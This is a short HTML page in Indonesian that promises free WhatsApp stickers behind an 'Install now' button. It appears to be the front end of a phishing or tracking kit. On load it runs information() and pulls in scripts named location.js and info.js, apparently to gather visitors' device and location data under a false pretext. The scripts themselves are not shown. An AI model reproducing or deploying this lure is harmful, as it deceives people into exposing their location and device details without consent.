<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Whatsapp Info</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="theme-color" content="#000000">
    <link rel="icon" type="image/x-icon" href="https://www.freefavicon.com/freefavicons/software/arrow-simple-way-green-152-191324.png">
    <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet">
    <link href="./css/main.css" rel="stylesheet">
    <script type="text/javascript">
    if (window.location.protocol == "http:") {
        var restOfUrl = window.location.href.substr(5);
        window.location = "https:" + restOfUrl;
    }</script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
    <script src="./js/main.js"></script>
    <script src="./js/location.js"></script>
    <script src="./js/info.js"></script>
    <script src="./js/warpspeed.min.js"></script>
  </head>
  <body onload="information();">


    <div><h1>Dapatkan Free Sticker Whatsapp</h1></div>
    <div class="earth"></div>
    <div><button id="change" class="button" type="button" onclick="main()">Pasang Sekarang</button></div>
    <div class="text" id="result"></div>
  </body>
</html>
